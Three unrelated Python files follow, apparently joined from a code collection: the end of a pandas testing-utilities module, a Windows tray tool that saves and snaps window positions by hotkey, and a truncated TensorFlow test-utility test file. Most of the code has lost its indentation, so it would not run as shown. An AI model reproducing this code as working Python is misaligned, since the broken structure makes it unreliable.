if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
    Context manager to set the numpy random number generator seed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
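# Illustrative sketch (not part of the original module): the same seed yields the
# same draw, and the global numpy RNG state is restored on exit.
def _example_rng_context():
    with RNGContext(42):
        first = np.random.randn()
    with RNGContext(42):
        second = np.random.randn()
    return first == second  # True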
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
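# Illustrative sketch (not part of the original module): temporarily registering a
# pipe-delimited dialect and parsing a line with the stdlib csv module.
def _example_with_csv_dialect():
    import csv
    with with_csv_dialect("piped", delimiter="|"):
        rows = list(csv.reader(["a|b|c"], dialect="piped"))
    return rows  # [['a', 'b', 'c']]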
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
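# Illustrative sketch (not part of the original module): forcing numexpr-backed
# evaluation off for a block of arithmetic, then restoring the previous setting.
# ``left`` and ``right`` are assumed to be numeric DataFrames supplied by the caller.
def _example_use_numexpr(left, right):
    with use_numexpr(False):
        return left + right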
def test_parallel(num_threads=2, kwargs_list=None):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
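# Illustrative sketch (not part of the original module): running a function on four
# threads, each thread receiving its own kwargs. Return values are dropped by design.
def _example_test_parallel():
    results = []
    @test_parallel(num_threads=4, kwargs_list=[{"i": i} for i in range(4)])
    def record(i):
        results.append(i)
    record()
    return sorted(results)  # [0, 1, 2, 3]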
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
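# Illustrative sketch (not part of the original module): a skipna-aware sum built by
# _make_skipna_wrapper, applied to a Series containing a missing value.
def _example_skipna_wrapper():
    wrapped = _make_skipna_wrapper(np.sum)
    return wrapped(Series([1.0, np.nan, 2.0]))  # 3.0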
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
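# Illustrative sketch (not part of the original module): the expected to_csv() text
# for two rows, joined with the current OS line separator.
def _example_convert_rows_list_to_csv_str():
    return convert_rows_list_to_csv_str(["a,b", "1,2"])
    # "a,b\n1,2\n" on POSIX; "a,b\r\n1,2\r\n" on Windows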
|
WinPosManager.py
|
#!/usr/bin/python
# -*- coding: utf8 -*-
import win32gui
import win32con
import win32api
from io import StringIO
import datetime
import os, sys
import tkinter as tk
import threading
import SysRegEdit
import SysRunAdmin
import WinPosCore as wp
import SysTrayIcon as tray
import system_hotkey
# constant value
MIN_WIDTH = 200
MIN_HEIGHT = 200
class WinPosManager(wp.WinData):
root: tk.Tk
popup: tk.Tk
wg_str_profile_name: tk.StringVar
m_width: int
m_height: int
m_margin_x: int
m_margin_y: int
m_win: int
# log message
wg_log_msg: tk.Text
def __init__(self):
wp.WinData.__init__(self)
self.root = tk.Tk()
self.popup = None
self.wg_str_profile_name = tk.StringVar()
self.removed = False
self.is_ui_load = False
self.is_ui_show = False
self.wg_log_msg = tk.Text()
self.m_width = MIN_WIDTH
self.m_height = MIN_HEIGHT
self.m_margin_x = 100
self.m_margin_y = 100
self.pos_mouse = (0, 0)
# minimize to python console window
def init_window(self):
self.m_win = win32gui.FindWindow(None, "WinPosManager")
#win32gui.ShowWindow(self.m_win, win32con.SW_MINIMIZE)
win32gui.ShowWindow(self.m_win, win32con.SW_HIDE)
def get_root(self):
if self.root == 0:
self.root = tk.Tk()
return self.root
def destroy(self):
if self.root == 0: return
if self.removed is False:
self.ui_show_toggle()
return
self.config_save()
self.root.destroy()
self.root = 0
def config_load(self):
conf = self.init2()
self.wg_str_profile_name.set(self.profile_name)
if conf and conf.get('manager'):
pos = conf['manager']['pos']
self.m_width = pos['w']
if self.m_width <= MIN_WIDTH:
self.m_width = MIN_WIDTH
self.m_height = pos['h']
if self.m_height <= MIN_HEIGHT:
self.m_height = MIN_HEIGHT
self.m_margin_x = pos['margin_x']
self.m_margin_y = pos['margin_y']
def config_save(self):
# check change config
if self.change_config is False: return
conf = {'pos': {
'w': self.m_width,
'h': self.m_height,
'margin_x': self.m_margin_x,
'margin_y': self.m_margin_y,
}}
self.save_config(p_conf=conf)
def ui_load(self):
root = self.get_root()
root.title("WinPosManager_UI")
self.ui_calc_geometry()
tk.Label(root, text="Windows Position Manager").pack()
tk.Button(root, text="Save", width=20, command=lambda: button_pressed(self, 'save')).pack()
tk.Button(root, text="Load", width=20, command=lambda: button_pressed(self, 'load')).pack()
tk.Button(root, text="Show", width=20, command=lambda: button_pressed(self, 'show')).pack()
tk.Button(root, text="Exit", width=20, command=lambda: self.destroy()).pack()
root.protocol("WM_DELETE", self.destroy)
return root
def ui_on_move(self, event):
root = self.get_root()
screen_width = root.winfo_screenwidth()
screen_height = root.winfo_screenheight()
now_width = root.winfo_width()
now_height = root.winfo_height()
now_x = root.winfo_x()
now_y = root.winfo_y()
now_margin_x = screen_width - now_width - now_x
now_margin_y = screen_height - now_height - now_y
if self.m_margin_x != now_margin_x:
self.m_margin_x = now_margin_x
self.change_config = True
if self.m_margin_y != now_margin_y:
self.m_margin_y = now_margin_y
self.change_config = True
if self.m_width != now_width:
self.m_width = now_width
self.change_config = True
if self.m_height != now_height:
self.m_height = now_height
self.change_config = True
#print("UI Move or resize event - changed: ", self.change_config)
def ui_calc_geometry(self, x=0, y=0):
screen_width = self.root.winfo_screenwidth()
screen_height = self.root.winfo_screenheight()
my_x = screen_width - self.m_width - self.m_margin_x
my_y = screen_height - self.m_height - self.m_margin_y
if x > 0 and x + self.m_width <= screen_width:
print("set x:", x)
my_x = x
if y > 0 and y + self.m_height <= screen_height:
print("set y:", y)
my_y = y
if my_x < 0:
print("reset x:", my_x)
my_x = 0
if my_y < 0:
print("reset y:", my_y)
my_y = 0
print("X:Y(%d:%d) - width x height: (%dx%d) scr(%dx%d)" % (my_x, my_y, self.m_width, self.m_height, screen_width, screen_height))
self.root.geometry("%dx%d+%d+%d" % (self.m_width, self.m_height, my_x, my_y))
def ui_show_toggle(self):
if self.is_ui_load is False: return False
if self.is_ui_show:
print("UI withdraw")
self.root.withdraw()
self.is_ui_show = False
else:
print("UI redraw")
self.root.deiconify()
self.root.focus_set()
self.is_ui_show = True
return True
def ui_load2(self):
root = self.get_root()
self.config_load()
root.overrideredirect(True)
root.title("WinPosManager_UI")
root.resizable(False, False)
self.ui_calc_geometry()
if self.ui_show_toggle() is True: return
self.is_ui_load = True
self.is_ui_show = True
def toggle_title():
if root.overrideredirect():
root.overrideredirect(False)
else:
root.overrideredirect(True)
frame0 = tk.Frame(root)
frame0.pack(fill=tk.X)
lbl = tk.Label(frame0, text="Windows Position Manager")
lbl.grid(row=0, column=0, padx=7)
btn0_1 = tk.Button(frame0, text="T", width=1, command=lambda: toggle_title())
btn0_1.grid(row=0, column=1)
btn0_2 = tk.Button(frame0, text="X", width=1, command=lambda: self.destroy())
btn0_2.grid(row=0, column=2)
frame1 = tk.Frame(root)
frame1.pack(fill=tk.X)
lbl1 = tk.Label(frame1, text="Profile: ", width=6)
lbl1.pack(side=tk.LEFT, padx=2, pady=2)
entry1 = tk.Entry(frame1, width=13, textvariable=self.wg_str_profile_name)
entry1.pack(side=tk.LEFT, fill=tk.X, padx=10)
def handle_event(event):
profile_name = win_mgr.wg_str_profile_name.get()
if not profile_name:
win_mgr.wg_str_profile_name.set(win_mgr.profile_name)
return
win_mgr.profile_name = profile_name
entry1.bind("<FocusOut>", handle_event)
frame2 = tk.Frame(root)
frame2.pack(fill=tk.X)
btn2_1 = tk.Button(frame2, text="Save", width=12, command=lambda: button_pressed(self, 'save'))
btn2_1.grid(row=0, column=0, padx=3, pady=3)
btn2_2 = tk.Button(frame2, text="Load", width=12, command=lambda: button_pressed(self, 'load'))
btn2_2.grid(row=0, column=1, padx=3)
frame3 = tk.Frame(root)
frame3.pack(fill=tk.X)
btn3_1 = tk.Button(frame3, text="Show", width=12, command=lambda: button_pressed(self, 'show'))
btn3_1.grid(row=0, column=0, padx=3)
btn3_2 = tk.Button(frame3, text="Close", width=12, command=lambda: self.destroy())
btn3_2.grid(row=0, column=1, padx=3)
frame4 = tk.Frame(root)
frame4.pack(fill=tk.BOTH)
#wg_log_msg = tk.Text(frame4, height=3, state=tk.DISABLED)
self.wg_log_msg.master = frame4
self.wg_log_msg.pack(fill=tk.BOTH)
def ui_on_closing():
print("UI close event")
self.destroy()
root.protocol("WM_DELETE_WINDOW", ui_on_closing)
root.bind('<B1-Motion>', lambda ev: self.ui_on_move(ev))
root.bind('<Configure>', lambda ev: self.ui_on_move(ev))
root.bind("<Escape>", lambda ev: self.ui_show_toggle())
root.focus_set()
return root
def popupmsg(self, msg):
if self.popup is not None:
self.popup.destroy()
self.popup = None
self.popup = tk.Tk()
self.popup.title('wininfo')
root = self.get_root()
width=400
height=300
x = self.popup.winfo_screenwidth() - width
y = root.winfo_y() - height
self.popup.geometry("%dx%d+%d+%d" % (width, height, x, y))
text_msg = tk.Text(self.popup, height=70)
text_msg.pack(fill=tk.BOTH)
text_msg.insert(1.0, msg)
text_msg.config(state=tk.DISABLED)
#self.popup.bind("<Key>", lambda ev: self.popup.withdraw())
self.popup.bind("<Escape>", lambda ev: self.popup.withdraw())
self.popup.focus_set()
def set_log_message(self, add_time, msg, cmd='insert'):
if cmd == 'insert':
now = datetime.datetime.now()
log_msg = ''
if len(self.wg_log_msg.get(0.0, tk.END)) > 1:
log_msg = "\n"
if add_time:
#log_msg += now.strftime("%Y%m%d %H:%M ")
log_msg += now.strftime("%H:%M:%S ")
log_msg += msg
self.wg_log_msg.config(state=tk.NORMAL)
self.wg_log_msg.insert(tk.END, log_msg)
self.wg_log_msg.see(tk.END)
self.wg_log_msg.config(state=tk.DISABLED)
elif cmd == 'clear':
self.wg_log_msg.config(state=tk.NORMAL)
self.wg_log_msg.delete(1.0, tk.END)
self.wg_log_msg.config(state=tk.DISABLED)
def button_pressed(mgr: WinPosManager, cmd):
stdout = sys.stdout
if mgr.is_ui_show:
profile_name = mgr.wg_str_profile_name.get()
else:
profile_name = mgr.profile_name
if not profile_name:
profile_name = "data"
mgr.profile_name = profile_name
print("profile: %s" % profile_name)
if mgr.is_ui_show:
mgr.set_log_message(True, "%s %s" % (cmd, profile_name))
if cmd == "show":
sys.stdout = buffer = StringIO()
wp.winpos_main(mgr, cmd)
if cmd == "show":
sys.stdout = stdout
mgr.popupmsg(buffer.getvalue())
if mgr.is_ui_show and cmd == "save":
mgr.set_log_message(False, "cnt: %03d, cntExclude: %03d" % (mgr.cnt, mgr.cntExclude))
if mgr.is_ui_show and len(mgr.logging_message) > 0:
mgr.set_log_message(False, mgr.logging_message)
mgr.logging_message = ''
def ui_show(sys_tray, forced):
if forced: # forced reload WinPosCore
win_mgr.init_done = False
root = win_mgr.ui_load2()
if win_mgr.pos_mouse[0] == 0:
win_mgr.pos_mouse = win32gui.GetCursorPos()
win_mgr.ui_calc_geometry(win_mgr.pos_mouse[0])
if root:
root.mainloop()
listPos = 10*[None]
def init_list_position():
global listPos
# get screen info
monitor_info = win32api.GetMonitorInfo(win32api.MonitorFromPoint(win32api.GetCursorPos()))
work_area = monitor_info.get("Work")
w_half_1 = int(work_area[2] / 2)
h_half_1 = int(work_area[3] / 2)
    margin_w = 15 # width correction: compensates for the empty area that otherwise appears on screen
margin_h = 20
'''
screen = win_mgr.get_window_screen()
w_half_1 = int(screen[0] /2)
h_half_1 = int(screen[1] /2)
'''
listPos[0] = 5* [None]
listPos[0][0] = wp.Rect().set([0 , 0 , int(w_half_1)+margin_w, h_half_1+margin_h])
listPos[0][1] = wp.Rect().set([w_half_1 , 0 , int(w_half_1)+margin_w, h_half_1+margin_h])
listPos[0][2] = wp.Rect().set([0 , h_half_1, int(w_half_1)+margin_w, h_half_1+margin_h])
listPos[0][3] = wp.Rect().set([w_half_1 , h_half_1, int(w_half_1)+margin_w, h_half_1+margin_h])
listPos[0][4] = wp.Rect().set([int(w_half_1 /2), int(h_half_1 /2), int(w_half_1)+margin_w, h_half_1+margin_h])
listPos[1] = 3* [None]
listPos[1][0] = wp.Rect().set([0 , h_half_1, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[1][1] = wp.Rect().set([int(w_half_1 /2), h_half_1, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[1][2] = wp.Rect().set([0 , h_half_1, int(w_half_1 )+margin_w, h_half_1+margin_h])
listPos[2] = 3* [None]
listPos[2][0] = wp.Rect().set([int(w_half_1 /2), h_half_1, int(w_half_1 /2), h_half_1])
listPos[2][1] = wp.Rect().set([int(w_half_1 ), h_half_1, int(w_half_1 /2), h_half_1])
listPos[2][2] = wp.Rect().set([int(w_half_1 /2), h_half_1, int(w_half_1 ), h_half_1])
listPos[3] = 3* [None]
listPos[3][0] = wp.Rect().set([w_half_1 -margin_w , h_half_1, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[3][1] = wp.Rect().set([w_half_1 + int(w_half_1 /2), h_half_1, int(w_half_1 /2) , h_half_1+margin_h])
listPos[3][2] = wp.Rect().set([w_half_1 -margin_w , h_half_1, int(w_half_1 )+margin_w, h_half_1+margin_h])
listPos[4] = 3* [None]
listPos[4][0] = wp.Rect().set([0 , 0, int(w_half_1 /2), h_half_1*2])
listPos[4][1] = wp.Rect().set([int(w_half_1 /2), 0, int(w_half_1 /2), h_half_1*2])
listPos[4][2] = wp.Rect().set([0 , 0, int(w_half_1 ), h_half_1*2])
listPos[6] = 3* [None]
listPos[6][0] = wp.Rect().set([w_half_1 -margin_w , 0, int(w_half_1 /2)+margin_w, h_half_1*2])
listPos[6][1] = wp.Rect().set([w_half_1 + int(w_half_1 /2), 0, int(w_half_1 /2) , h_half_1*2])
listPos[6][2] = wp.Rect().set([w_half_1 -margin_w , 0, int(w_half_1 )+margin_w, h_half_1*2])
listPos[7] = 3* [None]
listPos[7][0] = wp.Rect().set([0 , 0, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[7][1] = wp.Rect().set([int(w_half_1 /2), 0, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[7][2] = wp.Rect().set([0 , 0, int(w_half_1 )+margin_w, h_half_1+margin_h])
listPos[8] = 3* [None]
listPos[8][0] = wp.Rect().set([int(w_half_1 /2), 0, int(w_half_1 /2), h_half_1])
listPos[8][1] = wp.Rect().set([int(w_half_1 ), 0, int(w_half_1 /2), h_half_1])
listPos[8][2] = wp.Rect().set([int(w_half_1 /2), 0, int(w_half_1 ), h_half_1])
listPos[9] = 3* [None]
listPos[9][0] = wp.Rect().set([w_half_1 -margin_w , 0, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[9][1] = wp.Rect().set([w_half_1 + int(w_half_1 /2), 0, int(w_half_1 /2) , h_half_1+margin_h])
listPos[9][2] = wp.Rect().set([w_half_1 -margin_w , 0, int(w_half_1 )+margin_w, h_half_1+margin_h])
listMovedWin = []
def ui_resizer(sys_tray, key):
global listMovedWin, listPos
hwnd = win32gui.GetForegroundWindow()
print("current win id: ", hwnd)
    win_title = win32gui.GetWindowText(hwnd)
    print("current win name: ", win_title)
pos = win_mgr.get_window_rect(hwnd)
find_win = None
idx = None
for one in listMovedWin:
if one is None: break
if one['hwnd'] == hwnd:
find_win = one
idx = listMovedWin.index(one)
break
if find_win is not None:
print(find_win)
else:
find_win = dict(
hwnd=hwnd,
            title=win_title,
pos=pos,
key=key, # pressed key number
key_count=0,
)
listMovedWin.append(find_win)
def ui_move_position(idx):
if key == win32con.VK_NUMPAD5: # return original position
listMovedWin.remove(find_win)
return find_win["pos"]
new_pos = wp.Rect()
if find_win["key"] != key:
find_win["key"] = key
find_win["key_count"] = 0
        num_positions = len(listPos[idx])
        if find_win["key_count"] == num_positions: # return original position
listMovedWin.remove(find_win)
new_pos = find_win["pos"]
else:
new_pos = listPos[idx][find_win["key_count"]]
find_win["key_count"] += 1
pass
return new_pos
new_pos = wp.Rect()
if key >= win32con.VK_NUMPAD0 and key <= win32con.VK_NUMPAD9 :
new_pos = ui_move_position(key - win32con.VK_NUMPAD0)
if not new_pos.is_empty():
win32gui.SetWindowPos(hwnd, win32con.HWND_TOP, new_pos.x, new_pos.y, new_pos.w, new_pos.h, win32con.SWP_NOZORDER)
#listMovedWin[idx].update(find_win)
pass
def tray_menu():
import itertools, glob
icons = itertools.cycle(glob.glob('data/*.ico'))
hover_text = "WinPosManager"
menu_options = (
('Show', None, lambda sys_tray: ui_show(sys_tray, False)),
('Save', None, lambda sys_tray: button_pressed(win_mgr, 'save')),
('Load', None, lambda sys_tray: button_pressed(win_mgr, 'load')),
('Clear log', None, lambda sys_tray: win_mgr.set_log_message('', '', cmd='clear')),
('Experiments', None, (
('Reset', None, lambda sys_tray: ui_show(sys_tray, True)),
('Show debug msg.', None, lambda sys_tray: win32gui.ShowWindow(win_mgr.m_win, win32con.SW_SHOW)),
))
)
def get_click(sys_trayicon):
win_mgr.pos_mouse = win32gui.GetCursorPos()
def bye(sys_trayIcon):
print('Bye, Bye.')
#win_mgr.config_save()
win_mgr.removed = True
win_mgr.destroy()
tray.SysTrayIcon(next(icons), hover_text, menu_options, on_quit=bye, default_menu_index=0, on_click=get_click)
if win_mgr:
win_mgr.removed = True
win_mgr.destroy()
def run_as_admin():
if not SysRunAdmin.isUserAdmin():
print("You're not an admin.", os.getpid(), "params: ", sys.argv)
rc = SysRunAdmin.runAsAdmin()
win_mgr = WinPosManager()
win_mgr.config_load()
def enableHotkey():
hk = system_hotkey.SystemHotkey()
try:
hk.register(('super', 'control', 'z'), callback=lambda ev: button_pressed(win_mgr, 'load'))
hk.register(('super', 'control', 'x'), callback=lambda ev: button_pressed(win_mgr, 'save'))
# hk.register(('super', 'control', 'a'), callback=lambda ev: ui_show(ev, False))
hk.register(('super', 'control', 'kp_0'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD0))
hk.register(('super', 'control', 'kp_1'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD1))
hk.register(('super', 'control', 'k'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD2))
hk.register(('super', 'control', 'kp_3'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD3))
hk.register(('super', 'control', 'j'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD4))
hk.register(('super', 'control', 'kp_5'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD5))
hk.register(('super', 'control', 'l'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD6))
hk.register(('super', 'control', 'kp_7'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD7))
hk.register(('super', 'control', 'i'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD8))
hk.register(('super', 'control', 'kp_9'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD9))
    except system_hotkey.SystemRegisterError as e:
        print("already run this program: %s" % e)
        sys.exit(0)
    except Exception as e:
        print("key reg. fail: %s" % e)
if __name__ == '__main__':
#sys.exit(0)
# minimize to python console window
win_mgr.init_window()
# change directory
os.chdir(os.path.dirname(__file__))
#run_as_admin()
#SysRegEdit.execute(__file__)
init_list_position()
enableHotkey()
# app = threading.Thread(target=ShowUI)
# app.start()
tray_menu()
|
test_util_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase):
def test_assert_ops_in_graph(self):
with self.test_session():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegexp(AssertionError,
r"^Found unexpected node 'seven"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegexp(AssertionError,
r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
node_def = ops._NodeDef("op_type", "name")
node_def_orig = ops._NodeDef("op_type_orig", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
op = ops.Operation(node_def, ops.get_default_graph(), original_op=op_orig)
raise errors.UnauthenticatedError(node_def, op, "true_err")
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 7 + 1e-5)
def testAllCloseDictToNonDict(self):
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose(1, {"a": 1})
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose({"a": 1}, 1)
def testAllCloseDicts(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
# Identity.
self.assertAllClose(expected, expected)
self.assertAllClose(expected, dict(expected))
# With each item removed.
for k in expected:
actual = dict(expected)
del actual[k]
with self.assertRaisesRegexp(AssertionError, r"mismatched keys"):
self.assertAllClose(expected, actual)
# With each item changed.
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a + 1e-5, "b": b, "c": c})
with self.assertRaisesRegexp(AssertionError, r"Shape mismatch"):
self.assertAllClose(expected, {"a": a, "b": b + (4.,), "c": c})
